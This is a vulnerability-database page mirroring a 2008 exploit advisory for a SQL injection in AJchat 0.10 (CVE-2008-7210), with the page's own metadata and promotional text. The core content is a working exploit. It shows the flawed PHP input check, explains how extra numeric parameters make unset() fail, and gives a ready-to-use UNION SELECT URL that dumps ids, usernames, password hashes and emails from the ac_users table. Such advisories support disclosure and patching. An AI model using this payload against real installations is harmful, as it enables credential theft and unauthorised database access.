Lucene search
+L

AJchat 0.10 - 'unse' SQL Injection

🗓️ 11 Jan 2008 00:00:00Reported by Eugene MinaevType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 53 Views

AJchat Remote Sql Injection using unset() bu

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2008-7210
11 Sep 200916:00
cve
cvelist
Cvelist
CVE-2008-7210
11 Sep 200916:00
cvelist
euvd
EUVD
EUVD-2008-7169
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-7210
11 Sep 200916:30
nvd
prion
Prion
Sql injection
11 Sep 200916:30
prion
----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]

							AJchat Remote Sql Injection using unset() bug
							Eugene Minaev [email protected]
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
			. \_\\________[________________________________________]_________//_//_/ . .

		<?php
		if (isset($_GET["s"])){
		$_GET["s"] = strtoupper($_GET["s"]);
		if (strlen($_GET["s"])==1 && $_GET["s"]>='A' && $_GET["s"]<='Z'){
		// nothing
		}else unset($_GET['s']);
		}
		?>

		As we can see , $_GET['s'] can include only A..Z characters , in other way script unset() it.

		calc.exe s
		5861526=1
		5863704=1

		directory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01143
53